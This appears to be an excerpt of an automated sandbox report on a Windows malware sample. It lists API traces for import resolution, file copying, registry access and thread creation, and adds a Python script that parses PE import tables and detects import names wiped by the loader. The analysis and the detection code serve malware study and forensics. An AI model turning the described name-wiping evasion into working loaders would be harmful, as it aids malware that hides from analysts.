  • LoadLibraryA.KERNEL32(?), ref: 004013B6
  • lstrlenA.KERNEL32(?,?,?,004015E0,?), ref: 004013C9
  • memset.NTDLL ref: 004013D3
  • GetProcAddress.KERNEL32(?,00000002,?,?,?,004015E0,?), ref: 0040141E
  • lstrlenA.KERNEL32(00000002,?,?,?,004015E0,?), ref: 00401431
  • memset.NTDLL ref: 0040143B
Strings
Memory Dump Source
  • Source File: 00000003.00000001.563023218.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
  • Associated: 00000003.00000001.563010253.00400000.00000002.sdmp
  • Associated: 00000003.00000001.563037124.00402000.00000002.sdmp
  • Associated: 00000003.00000001.563047325.00403000.00000008.sdmp
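The routine above (E00401389) is a manual import resolver for a PE32 image the sample has mapped itself: it walks IMAGE_IMPORT_DESCRIPTOR entries from DataDirectory[IMPORT], calls LoadLibraryA/GetProcAddress for each name, writes the results into FirstThunk, and then zeroes the DLL and function name strings with memset, which is why a later memory dump of the payload shows an intact IAT but empty import names. The Python below is an added example, not code from the Joe Sandbox report or from the sample; it parses the same structures with the same offsets on a constructed in-memory PE32 image, simulates the wipe, and flags the zeroed name strings an analyst would see in a post-execution dump. The image layout, the placeholder resolved addresses (0x76000000 + 0x10 * i), the fallback to FirstThunk when OriginalFirstThunk is 0, and the out-of-image RVA check are assumptions of the example.

```python
import struct

# Structure offsets used by the decompiled resolver (IMAGE_NT_HEADERS32 / PE32 layout).
NT_SIZEOFIMAGE = 0x50        # NT headers + 0x50 = OptionalHeader.SizeOfImage
NT_IMPORT_DIR = 0x80         # NT headers + 0x80 = DataDirectory[IMPORT].VirtualAddress
DESC_SIZE = 0x14             # sizeof(IMAGE_IMPORT_DESCRIPTOR); Name at +0xc, FirstThunk at +0x10
IMPORT_BY_NAME_NAME = 2      # IMAGE_IMPORT_BY_NAME: 2-byte Hint, then the NUL-terminated name
ORDINAL_FLAG32 = 0x80000000  # high bit set in a thunk = import by ordinal


def _cstring(buf, rva):
    """NUL-terminated string at an RVA of a mapped image (RVA == offset)."""
    return bytes(buf[rva:buf.index(b"\x00", rva)])


def _zero_cstring(buf, rva):
    """What memset(s, 0, lstrlenA(s)) leaves behind: the string body becomes NULs."""
    end = buf.index(b"\x00", rva)
    buf[rva:end] = b"\x00" * (end - rva)


def walk_imports(img):
    """Parse the import directory of a mapped PE32 image.

    One dict per IMAGE_IMPORT_DESCRIPTOR: DLL name and its RVA, the entries of the thunk
    array the resolver walks (OriginalFirstThunk, or FirstThunk when that is 0) as
    (kind, value, rva) tuples, and the raw FirstThunk (IAT) values."""
    e_lfanew = struct.unpack_from("<I", img, 0x3C)[0]
    if img[e_lfanew:e_lfanew + 4] != b"PE\x00\x00":
        raise ValueError("no PE signature at e_lfanew")
    size_of_image = struct.unpack_from("<I", img, e_lfanew + NT_SIZEOFIMAGE)[0]
    desc = struct.unpack_from("<I", img, e_lfanew + NT_IMPORT_DIR)[0]
    descriptors = []
    while desc:
        oft, _stamp, _fwd, name_rva, ft = struct.unpack_from("<5I", img, desc)
        if name_rva == 0:                       # all-zero descriptor terminates the table
            break
        entries = []
        thunks = oft or ft
        while True:
            t = struct.unpack_from("<I", img, thunks + 4 * len(entries))[0]
            if t == 0:
                break
            if t & ORDINAL_FLAG32:
                entries.append(("ordinal", t & 0xFFFF, 0))
            elif t >= size_of_image:            # assumption: RVA outside the image is invalid
                entries.append(("bad_rva", t, t))
            else:
                entries.append(("name", _cstring(img, t + IMPORT_BY_NAME_NAME), t))
        iat = [struct.unpack_from("<I", img, ft + 4 * i)[0] for i in range(len(entries))]
        descriptors.append({"dll": _cstring(img, name_rva), "name_rva": name_rva,
                            "entries": entries, "first_thunk": ft, "iat": iat})
        desc += DESC_SIZE
    return descriptors


def wiped_imports(img):
    """Flag name strings that are empty although their RVA is set: the footprint the
    two memset calls in the resolver leave in a post-execution dump."""
    findings = []
    for d in walk_imports(img):
        if d["dll"] == b"":
            findings.append(("dll_name_wiped", d["name_rva"]))
        for kind, value, rva in d["entries"]:
            if kind == "name" and value == b"":
                findings.append(("func_name_wiped", rva))
    return findings


def simulate_loader_wipe(img):
    """Copy of the image as the resolver leaves it: IAT slots hold placeholder
    resolved addresses and every DLL/function name string has been zeroed."""
    out = bytearray(img)
    for d in walk_imports(img):
        _zero_cstring(out, d["name_rva"])
        for i, (kind, _value, rva) in enumerate(d["entries"]):
            struct.pack_into("<I", out, d["first_thunk"] + 4 * i, 0x76000000 + 0x10 * i)
            if kind == "name":
                _zero_cstring(out, rva + IMPORT_BY_NAME_NAME)
    return bytes(out)


def build_sample_image():
    """Constructed minimal PE32 image (not data from the report): DOS header at 0,
    NT headers at 0x40, import descriptors at 0x200, strings/thunks from 0x300."""
    img = bytearray(0x1000)
    pool = [0x300]

    def alloc(data):                    # bump allocator, 4-byte aligned
        off = pool[0]
        img[off:off + len(data)] = data
        pool[0] = (off + len(data) + 3) & ~3
        return off

    img[0:2] = b"MZ"
    struct.pack_into("<I", img, 0x3C, 0x40)             # e_lfanew
    nt = 0x40
    img[nt:nt + 4] = b"PE\x00\x00"
    struct.pack_into("<HH", img, nt + 4, 0x14C, 0)      # Machine = i386, no sections
    struct.pack_into("<H", img, nt + 0x18, 0x10B)       # PE32 optional header magic
    struct.pack_into("<I", img, nt + NT_SIZEOFIMAGE, len(img))
    struct.pack_into("<I", img, nt + NT_IMPORT_DIR, 0x200)
    table = [(b"KERNEL32.dll", [b"LoadLibraryA", b"GetProcAddress", 7]),  # 7 = by ordinal
             (b"ADVAPI32.dll", [b"RegOpenKeyA"])]
    desc = 0x200
    for dll, funcs in table:
        thunks = [alloc(struct.pack("<H", 0) + f + b"\x00") if isinstance(f, bytes)
                  else ORDINAL_FLAG32 | f for f in funcs]
        packed = struct.pack("<%dI" % (len(thunks) + 1), *thunks, 0)
        oft, ft = alloc(packed), alloc(packed)
        struct.pack_into("<5I", img, desc, oft, 0, 0, alloc(dll + b"\x00"), ft)
        desc += DESC_SIZE
    return bytes(img)


if __name__ == "__main__":
    clean = build_sample_image()
    for d in walk_imports(clean):
        print(d["dll"], [e[:2] for e in d["entries"]])
    print(wiped_imports(simulate_loader_wipe(clean)))
```

Run against a real dump, feed `walk_imports` the bytes of the mapped region starting at the image base; a descriptor whose FirstThunk values are absolute addresses while its name RVAs point at NUL bytes is the state this resolver leaves behind, and the names have to be recovered by matching the IAT addresses against the exports of the loaded modules rather than from the image itself.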
Similarity
  • Total matches: 31
  • API ID: CreateDirectory$CopyFileHeapFreeRtlAllocateHeaplstrcpy
  • String ID: \sols
  • API String ID: 2898405644-25449109
  • Opcode ID: 5497166955076156837619a2a098418b7cb76563a9d137fec855e451e2c56df1
  • Instruction ID: 44ec2210092a92e039f9b1496625380036570e436bac4a4be39adbf8d21673e3
  • Opcode Fuzzy Hash: F2E0ABB50504208B9013D4B671183389C4698102F219D4511FB06BC48FAFD302A5FB6E
  • Instruction Fuzzy Hash: 44ec2210092a92e039f9b1496625380036570e436bac4a4be39adbf8d21673e3
APIs
  • RtlAllocateHeap.NTDLL(00000000,?), ref: 001C1BC4
  • lstrcpyW.KERNEL32(00000000,001C1DC2), ref: 001C1BD5
  • CreateDirectoryW.KERNEL32(00000000,00000000,?,00000000,?,?,?,\sols,001C1DC2,?,?), ref: 001C1BEC
  • CreateDirectoryW.KERNEL32(00000000,00000000,?,?,0000005C,?,00000000,?,?,?,\sols,001C1DC2,?,?), ref: 001C1C05
  • CopyFileW.KERNEL32(?,00000000,00000000), ref: 001C1C34
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C1C42
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 80
  • API ID: GetLastError$CloseHandleDuplicateHandleOpenProcessRegCloseKeyRegCreateKeyRegOpenKey
  • String ID:
  • API String ID: 3239362136-0
  • Opcode ID: 43d6ef705f251b34ef39b149b3ea3bd8fb900b51b25fecf4a76b54cbc8c7a116
  • Instruction ID: 43568bf06b197137d00305a6dda9a24464bc0a833492d0823832902715db9840
  • Opcode Fuzzy Hash: 4CD0C2B8000985CF04479878487AAFFEA01BEC21C155C5A72F9C06824F769172DF0B6B
  • Instruction Fuzzy Hash: 43568bf06b197137d00305a6dda9a24464bc0a833492d0823832902715db9840
APIs
  • OpenProcess.KERNEL32(00000040,00000000,?), ref: 001C2802
  • RegCreateKeyA.ADVAPI32(80000001,?,?), ref: 001C2820
  • RegOpenKeyA.ADVAPI32(80000001,?,?), ref: 001C2828
  • DuplicateHandle.KERNEL32(?,00000000,?,00000000,00000000,00000002), ref: 001C2846
  • GetLastError.KERNEL32 ref: 001C285A
  • RegCloseKey.ADVAPI32(?), ref: 001C2865
  • CloseHandle.KERNEL32(00000000), ref: 001C286C
  • GetLastError.KERNEL32 ref: 001C2874
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 54
  • API ID: HeapFree$RegCloseKeyRegCreateKey
  • String ID:
  • API String ID: 3276616890-0
  • Opcode ID: b82f1d124a686c0fba74e06d606f12bbe42e9b5bf24afcb4d9ffa1ad41822641
  • Instruction ID: c57badf541bd68534790deaa67724b48a31e467339e930acdbfe2d3de4c2c09d
  • Opcode Fuzzy Hash: 4A118C6A048DC253C06778C5B1BB7F5C412BB82CD0C4D1363FEA46D65C6E8372D66B02
  • Instruction Fuzzy Hash: c57badf541bd68534790deaa67724b48a31e467339e930acdbfe2d3de4c2c09d
APIs
  • RegCreateKeyA.ADVAPI32(80000001,?), ref: 001C9DC7
  • HeapFree.KERNEL32(00000000,?), ref: 001C9E08
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C9E18
  • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,001CA93B,00000000,?,?,?), ref: 001C9EA8
    • Part of subcall function 001C9BEF: RtlAllocateHeap.NTDLL(00000000,00000001), ref: 001C9C4A
    • Part of subcall function 001C9BEF: RtlReAllocateHeap.NTDLL(00000000,00000000,8B50F445,?), ref: 001C9C75
    • Part of subcall function 001C9BEF: memcpy.NTDLL(00000000,00000000,00000000,?,?,?,?,?,001CAB3A,?,001E5048,00000000), ref: 001C9C94
    • Part of subcall function 001C9BEF: HeapFree.KERNEL32(00000000,00000000), ref: 001C9CF5
    • Part of subcall function 001C9BEF: memcpy.NTDLL(?,00000000,001E5048,00000000,?,?,8B50F445,001CAB3A,?,?,?,?,?,001CAB3A,?,001E5048), ref: 001C9D17
  • HeapFree.KERNEL32(00000000,00000000,?), ref: 001C9E84
    • Part of subcall function 001C947B: lstrlen.KERNEL32(?,001E5048,00000000), ref: 001C94A0
    • Part of subcall function 001C947B: wsprintfA.USER32 ref: 001C94E0
    • Part of subcall function 001C947B: HeapFree.KERNEL32(00000000,?), ref: 001C9514
    • Part of subcall function 001C947B: HeapFree.KERNEL32(00000000,?), ref: 001C954D
    • Part of subcall function 001C947B: memcpy.NTDLL(?,001EB23B,-000000FA), ref: 001C95B0
    • Part of subcall function 001C947B: memcpy.NTDLL(00000000,?,001EB240), ref: 001C95FF
    • Part of subcall function 001C947B: memcpy.NTDLL(?,?,00000000), ref: 001C9619
    • Part of subcall function 001C947B: memcpy.NTDLL(?,00000000,001CAB3A), ref: 001C9638
    • Part of subcall function 001C947B: HeapFree.KERNEL32(00000000,?), ref: 001C964E
    • Part of subcall function 001C947B: HeapFree.KERNEL32(00000000,?), ref: 001C9672
    • Part of subcall function 001C947B: HeapFree.KERNEL32(00000000,00000000), ref: 001C96B4
    • Part of subcall function 001C947B: RtlAllocateHeap.NTDLL(00000000,00000000), ref: 001C96D3
    • Part of subcall function 001C947B: memcpy.NTDLL(00000000,00000008,-000000F7,?,?,?,?,001EC448,?,?,001CAB3A,001E5048,00000000), ref: 001C96F2
    • Part of subcall function 001C947B: StrChrA.SHLWAPI(00000000,0000003B), ref: 001C9708
    • Part of subcall function 001C947B: StrToIntExA.SHLWAPI(00000001,00000000,?), ref: 001C971D
    • Part of subcall function 001C947B: memmove.NTDLL(00000000,00000000,001CAB3A,?,?,?,?,?,?,?,001EC448,?,?,001CAB3A,001E5048,00000000), ref: 001C9742
    • Part of subcall function 001C947B: HeapFree.KERNEL32(00000000,00000000), ref: 001C978D
    • Part of subcall function 001C947B: RtlAllocateHeap.NTDLL(00000000,00000000), ref: 001C97A9
    • Part of subcall function 001C947B: memcpy.NTDLL(00000000,001EB239,-00000008,?,?,?,?,?,?,?,?,001EC448,?,?,001CAB3A,001E5048), ref: 001C97C8
    • Part of subcall function 001C947B: StrChrA.SHLWAPI(00000000,0000002C), ref: 001C97DB
    • Part of subcall function 001C947B: StrTrimA.SHLWAPI(00000000,001E53C4), ref: 001C97F4
    • Part of subcall function 001C947B: StrTrimA.SHLWAPI(?,001E53C4), ref: 001C9802
    • Part of subcall function 001C947B: StrToIntExA.SHLWAPI(00000000,00000000,?), ref: 001C9811
    • Part of subcall function 001C947B: StrToIntExA.SHLWAPI(?,00000000,?), ref: 001C982C
    • Part of subcall function 001C947B: memmove.NTDLL(001EB240,00000000,001CAB3A,?,?,?,?,?,?,?,?,?,?,?,001EC448,?), ref: 001C9860
    • Part of subcall function 001C947B: HeapFree.KERNEL32(00000000,00000000), ref: 001C98AC
    • Part of subcall function 001C947B: RtlAllocateHeap.NTDLL(00000000,00000000), ref: 001C98C8
    • Part of subcall function 001C947B: memcpy.NTDLL(00000000,001EB239,-00000008,?,?,?,?,?,?,?,?,?,?,?,?,001EC448), ref: 001C98E7
    • Part of subcall function 001C947B: memmove.NTDLL(001EB240,00000000,001CAB3A,00000000,00000001), ref: 001C992A
    • Part of subcall function 001C947B: HeapFree.KERNEL32(00000000,00000000), ref: 001C9976
    • Part of subcall function 001C947B: RtlAllocateHeap.NTDLL(00000000,00000000), ref: 001C9992
    • Part of subcall function 001C947B: memcpy.NTDLL(00000000,001EB23B,-00000006), ref: 001C99B1
    • Part of subcall function 001C947B: memmove.NTDLL(001EB240,00000000,001CAB3A), ref: 001C99E6
    • Part of subcall function 001C947B: HeapFree.KERNEL32(00000000,00000000), ref: 001C9A25
  • HeapFree.KERNEL32(00000000,?), ref: 001C9ECD
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C9EE2
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 48
  • API ID: memcpy$HeapFreeRtlAllocateHeapRtlReAllocateHeap
  • String ID: W
  • API String ID: 1276199752-655174618
  • Opcode ID: f18a74b07f9afbff4fbb1da3eaf88715fd0ddee12a97bcb20455e5be1c2ad612
  • Instruction ID: c0b03335e1cdc8a4a85f4a27e60ff9fc03c9f2370bcb513438216c7a5ae8850f
  • Opcode Fuzzy Hash: 03016D10445B8247C55B60824161F6FE349BF40299C8DFB729DA8A55DA0F8133165B1F
  • Instruction Fuzzy Hash: c0b03335e1cdc8a4a85f4a27e60ff9fc03c9f2370bcb513438216c7a5ae8850f
APIs
  • RtlAllocateHeap.NTDLL(00000000,00000001), ref: 001C9C4A
  • RtlReAllocateHeap.NTDLL(00000000,00000000,8B50F445,?), ref: 001C9C75
  • memcpy.NTDLL(00000000,00000000,00000000,?,?,?,?,?,001CAB3A,?,001E5048,00000000), ref: 001C9C94
    • Part of subcall function 001C9AD3: memcpy.NTDLL(00000000,001C9CB4,00000000,?,?,?,001C9CB4,00000000,?,?,8B50F445,001CAB3A), ref: 001C9B11
    • Part of subcall function 001C9AD3: memcpy.NTDLL(?,8B50F445,?,?,?,8B50F445,001CAB3A,?,?,?,?,?,001CAB3A,?,001E5048,00000000), ref: 001C9B97
    • Part of subcall function 001C9AD3: memcpy.NTDLL(?,03F8458B,00000000,?,?,?,?,?,8B50F445,001CAB3A,?,?,?,?,?,001CAB3A), ref: 001C9BCE
    • Part of subcall function 001C9AD3: LocalFree.KERNEL32(001CAB3A,?,?,?,?,?,?,?,?,8B50F445,001CAB3A,?,?,?,?,?), ref: 001C9BDC
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C9CF5
  • memcpy.NTDLL(?,00000000,001E5048,00000000,?,?,8B50F445,001CAB3A,?,?,?,?,?,001CAB3A,?,001E5048), ref: 001C9D17
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 55
  • API ID: HeapFree$RtlImageNtHeaderStrChrStrTrimlstrlen
  • String ID:
  • API String ID: 3913414161-0
  • Opcode ID: 64ffad91cf0a2c2a078577b4f201d2562d86aecfc72bb8ed0596f04317282702
  • Instruction ID: 5c8f5e3f264bf94214ba879482e542f8f17e65cc0a446fb3bbf97f4741ac0ea8
  • Opcode Fuzzy Hash: 0401CB24280D82C289019CEE845C63AE54AFB033E290D75B2D7523C00E7B437AF7EF09
  • Instruction Fuzzy Hash: 5c8f5e3f264bf94214ba879482e542f8f17e65cc0a446fb3bbf97f4741ac0ea8
APIs
    • Part of subcall function 001D959E: lstrlen.KERNEL32(?,001EAC78,00000000,00000000,001C4C52,00000000,00000000,00000000,00000001,?,?,001CD506,00000000,00000000), ref: 001D95A7
    • Part of subcall function 001D959E: memcpy.NTDLL(00000000,?,00000000,00000001,?,?,001CD506,00000000,00000000,?,?,00000000,001CD6F9), ref: 001D95CA
    • Part of subcall function 001D959E: memset.NTDLL ref: 001D95D9
  • StrChrA.SHLWAPI(00000000,00000020), ref: 001CDB7A
  • StrTrimA.SHLWAPI(00000000,001E53CC), ref: 001CDB90
    • Part of subcall function 001C3B4A: HeapFree.KERNEL32(00000000,?,?), ref: 001C3BCD
  • RtlImageNtHeader.NTDLL(?), ref: 001CDBB8
  • HeapFree.KERNEL32(00000000,?), ref: 001CDBDF
    • Part of subcall function 001D7471: GetCurrentThreadId.KERNEL32(?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74A9
    • Part of subcall function 001D7471: GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74B5
    • Part of subcall function 001D7471: GetTempFileNameA.KERNEL32(00000000,00000000,?,00000000), ref: 001D74C3
    • Part of subcall function 001D7471: lstrcpy.KERNEL32(00000000), ref: 001D74DE
    • Part of subcall function 001C1966: lstrlen.KERNEL32(?,00000001,?,?,?,00000001,?,?), ref: 001C19D1
    • Part of subcall function 001C1966: HeapFree.KERNEL32(00000000,00000000), ref: 001C19F9
  • lstrlen.KERNEL32(00000000,00000000,?), ref: 001CDC47
    • Part of subcall function 001C3CF4: RegCloseKey.ADVAPI32(00000057,?,?,001C27E9,001EC202,00000000,00000000,00000000,001EAC78,00000000,00000000,?,?,?,001C4A87,00000000), ref: 001C3D3F
  • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001CDC76
  • HeapFree.KERNEL32(00000000,00000000,?), ref: 001CDC94
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 56
  • API ID: CreateEventCreateMutexCreateThreadGetLastErrorRtlInitializeCriticalSectionmemcpymemset
  • String ID:
  • API String ID: 850450842-0
  • Opcode ID: 16ca8f20d85ab577bbc2653173ab980685e792abd2a2311232cd2963c8cd0ec7
  • Instruction ID: 3fadbc5382079b4f520af86300a4450702f7eeedec2a4e1bbd964f091d5ad8f9
  • Opcode Fuzzy Hash: EDF0DDF30A4E85BBE423A12250A13BA0A03B74A2CEF8D3510FBB5640590F6072E26D45
  • Instruction Fuzzy Hash: 3fadbc5382079b4f520af86300a4450702f7eeedec2a4e1bbd964f091d5ad8f9
APIs
  • memset.NTDLL ref: 001DB75F
  • memcpy.NTDLL(0000002C,00000000,00000010,00000000,00000000,00000054,00000054), ref: 001DB76D
  • RtlInitializeCriticalSection.NTDLL(00000008), ref: 001DB779
  • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,?,?,?,?,?,00000054), ref: 001DB78C
  • CreateMutexA.KERNEL32(00000000,00000000,00000000,?,?,?,?,?,00000054), ref: 001DB7A6
  • CreateThread.KERNEL32(00000000,00000000,001DB47B,?,00000000,?), ref: 001DB7F0
  • GetLastError.KERNEL32(?,?,?,?,?,00000054), ref: 001DB810
    • Part of subcall function 001DB838: SetEvent.KERNEL32(?,001C1F1A,?,001EB068,?,00000000,001C13EB), ref: 001DB84C
    • Part of subcall function 001DB838: WaitForSingleObject.KERNEL32(?,000000FF), ref: 001DB866
    • Part of subcall function 001DB838: CloseHandle.KERNEL32(?), ref: 001DB86F
    • Part of subcall function 001DB838: CloseHandle.KERNEL32(?), ref: 001DB87D
    • Part of subcall function 001DB838: RtlEnterCriticalSection.NTDLL(00000008), ref: 001DB889
    • Part of subcall function 001DB838: RtlLeaveCriticalSection.NTDLL(00000008), ref: 001DB8B2
    • Part of subcall function 001DB838: Sleep.KERNEL32(000001F4), ref: 001DB8C1
    • Part of subcall function 001DB838: CloseHandle.KERNEL32(?), ref: 001DB8CE
    • Part of subcall function 001DB838: LocalFree.KERNEL32(?), ref: 001DB8DC
    • Part of subcall function 001DB838: RtlDeleteCriticalSection.NTDLL(00000008), ref: 001DB8E6
    • Part of subcall function 001C12EA: RtlAllocateHeap.NTDLL(00000000,00000000,001D9396), ref: 001C12F6
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 25
  • API ID: HeapFree$DeleteFileGetLastErrorInterlockedDecrementInterlockedIncrementlstrcpy
  • String ID:
  • API String ID: 699546578-0
  • Opcode ID: 532f2b5cd79be1598055c22557b2267d7091050a8bc957485613e12867e2baf4
  • Instruction ID: 7e10fe87f0924755e3c3f139aefbb8723367e80e6c71fdf06343399dbcc04d08
  • Opcode Fuzzy Hash: 63F076B8404D85CBC62364B588AA7BE46457F824E5D0CE33AA584B101B1F0365B79F85
  • Instruction Fuzzy Hash: 7e10fe87f0924755e3c3f139aefbb8723367e80e6c71fdf06343399dbcc04d08
APIs
  • InterlockedIncrement.KERNEL32(001EAF5C), ref: 001C1F73
  • lstrcpy.KERNEL32(00000000), ref: 001C1FA8
    • Part of subcall function 001D6CC6: lstrlen.KERNEL32(?,?,00000000,?,00000000,001C7543,?,?,?,?,?,?,?,?,?,001C1255), ref: 001D6CD5
    • Part of subcall function 001DD17E: memset.NTDLL ref: 001DD192
  • HeapFree.KERNEL32(00000000,?), ref: 001C2050
    • Part of subcall function 001DD36B: memset.NTDLL ref: 001DD3C6
    • Part of subcall function 001DD36B: SetLastError.KERNEL32(00000000,?,?,?), ref: 001DD41A
    • Part of subcall function 001DD36B: WaitForSingleObject.KERNEL32(?,?), ref: 001DD599
    • Part of subcall function 001DD36B: Sleep.KERNEL32(?,?,?,00000001,?,?,00000000,0000000C,0000000F,?,00000000,00000000,?,?,?,?), ref: 001DD5AA
  • GetLastError.KERNEL32(00000000), ref: 001C2039
  • InterlockedDecrement.KERNEL32(001EAF5C), ref: 001C2067
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C2098
    • Part of subcall function 001C771B: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000), ref: 001C775C
    • Part of subcall function 001C771B: lstrlen.KERNEL32(00000000,?,00000000,?,?,001C1255,00000000,00000000,00000004), ref: 001C7774
    • Part of subcall function 001C771B: RtlAllocateHeap.NTDLL(00000000,00000002), ref: 001C7788
    • Part of subcall function 001C771B: mbstowcs.NTDLL ref: 001C7798
    • Part of subcall function 001C771B: HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001C77B6
    • Part of subcall function 001C771B: CloseHandle.KERNEL32(?), ref: 001C77C0
    • Part of subcall function 001C771B: HeapFree.KERNEL32(00000000,00000000,?), ref: 001C77CF
    • Part of subcall function 001D7471: GetCurrentThreadId.KERNEL32(?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74A9
    • Part of subcall function 001D7471: GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74B5
    • Part of subcall function 001D7471: GetTempFileNameA.KERNEL32(00000000,00000000,?,00000000), ref: 001D74C3
    • Part of subcall function 001D7471: lstrcpy.KERNEL32(00000000), ref: 001D74DE
  • DeleteFileA.KERNEL32(00000000), ref: 001C2088
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 43
  • API ID: HeapFreeRtlEnterCriticalSectionRtlLeaveCriticalSectionSleeplstrcpylstrlenmemcpy
  • String ID:
  • API String ID: 2790639078-0
  • Opcode ID: 1766a587401683fdb30044bc6672b38e50223d8055563f5057ad240d85219721
  • Instruction ID: f742db94e7bccdeb672c9316879cf6e869411e6e683690c3bbd30f2f23ea435e
  • Opcode Fuzzy Hash: 5301CB70045D41C7DA7730898822B75C948FF5A3F1C0D6F71ED127468A6F83719AEA4E
  • Instruction Fuzzy Hash: f742db94e7bccdeb672c9316879cf6e869411e6e683690c3bbd30f2f23ea435e
APIs
    • Part of subcall function 001C57CC: RtlEnterCriticalSection.NTDLL(001EB248), ref: 001C57D4
    • Part of subcall function 001C57CC: RtlLeaveCriticalSection.NTDLL(001EB248), ref: 001C57E9
    • Part of subcall function 001C57CC: InterlockedIncrement.KERNEL32(0000001C), ref: 001C5802
  • lstrlen.KERNEL32(00000008,?,?,?,001C402D,00000000,00000000), ref: 001C5876
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C5898
  • memcpy.NTDLL(00000000,00000000,00000000,?,?,?,001C402D,00000000,00000000), ref: 001C58AA
  • lstrcpy.KERNEL32(00000020,00000008), ref: 001C58DC
  • RtlEnterCriticalSection.NTDLL(001EB248), ref: 001C58E8
  • Sleep.KERNEL32(0000000A), ref: 001C58F2
  • RtlLeaveCriticalSection.NTDLL(001EB248), ref: 001C5940
    • Part of subcall function 001C5761: InterlockedDecrement.KERNEL32(0000001C), ref: 001C5765
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 43
  • API ID: HeapFree$CloseHandleRtlImageNtHeader
  • String ID: [FILE]$[FILE]
  • API String ID: 2457384462-3230400787
  • Opcode ID: 16df8d8f854be46f27ed78846379e5e64a1e712c0788b603984e536008b4b39b
  • Instruction ID: 7a99e9afe2944490d027556a012c57452c29353fe49cd997913ba4f9baac3b11
  • Opcode Fuzzy Hash: 94F0AC39154F43A7892360C4A0207A99B84FFA21D1C8CA723E9857D1CF7E033262BE43
  • Instruction Fuzzy Hash: 7a99e9afe2944490d027556a012c57452c29353fe49cd997913ba4f9baac3b11
APIs
  • RtlImageNtHeader.NTDLL(00000094), ref: 001C2A5A
    • Part of subcall function 001C29BF: RtlAllocateHeap.NTDLL(00000000,00010000,00000000), ref: 001C29D8
    • Part of subcall function 001C29BF: CreateDirectoryW.KERNEL32(00000000,00000000,?,?,001C2A7A,00000000), ref: 001C2A06
    • Part of subcall function 001C29BF: lstrlenW.KERNEL32(00000000,?,?,001C2A7A,00000000), ref: 001C2A12
    • Part of subcall function 001C29BF: HeapFree.KERNEL32(00000000,00000000), ref: 001C2A2A
  • CloseHandle.KERNEL32(001EAF58), ref: 001C2AA0
    • Part of subcall function 001C2884: lstrcatW.KERNEL32(00000000,00000000), ref: 001C2896
    • Part of subcall function 001C2884: WaitForSingleObject.KERNEL32(00002710,00000000), ref: 001C28B9
    • Part of subcall function 001C2884: CreateFileW.KERNEL32(00000000,80000000,00000000,00000000,00000003,00000080,00000000), ref: 001C28DB
    • Part of subcall function 001C2884: GetLastError.KERNEL32(?,001C2AC6,.dll,00000094,00001000,00000000,00000000,00001000), ref: 001C28EF
  • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001C2B43
    • Part of subcall function 001D9EAA: lstrlenW.KERNEL32(00000000,00000000,00000000,.dll,001C2B1B,00000000,.dll,00000094,00001000,00000000,00000000,00001000), ref: 001D9EB8
    • Part of subcall function 001D9EAA: lstrlen.KERNEL32(DllRegisterServer), ref: 001D9EC6
    • Part of subcall function 001D9EAA: RtlAllocateHeap.NTDLL(00000000,00000022), ref: 001D9EDB
    • Part of subcall function 001D9E63: HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001D9E93
  • HeapFree.KERNEL32(00000000,00000000,.dll), ref: 001C2B52
    • Part of subcall function 001C28FD: RegOpenKeyA.ADVAPI32(80000001,001EC2F4,00000000), ref: 001C2917
    • Part of subcall function 001C28FD: lstrcmpiW.KERNEL32(00001000,00000000,00000000,00001000,00000000,00000000,?,?,?,001C2B34,00000000,00000001,.dll,00000094,00001000,00000000), ref: 001C294D
    • Part of subcall function 001C28FD: lstrlenW.KERNEL32(00000000,00000000,00001000,00000000,00000000,?,?,?,001C2B34,00000000,00000001,.dll,00000094,00001000,00000000,00000000), ref: 001C295A
    • Part of subcall function 001C28FD: RegCloseKey.ADVAPI32(00000000,?,?,?,001C2B34,00000000,00000001,.dll,00000094,00001000,00000000,00000000,00001000), ref: 001C29B0
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 60
  • API ID: lstrlen$GetDriveTypeHeapFreeRtlAllocateHeapWaitForSingleObjectmemset
  • String ID:
  • API String ID: 3218151923-0
  • Opcode ID: 974418b0150871375a409eae20db66cf184f8890a346e9cc83530061c0aa9893
  • Instruction ID: 718056d6f187fa39222f68099688de0a74eaf81b8bf602d31d72af443bcdc1fc
  • Opcode Fuzzy Hash: 97F02461CA2887A7900B446974553AEDA116F416C9D4C0B62ED412814EAF0732E6EB4A
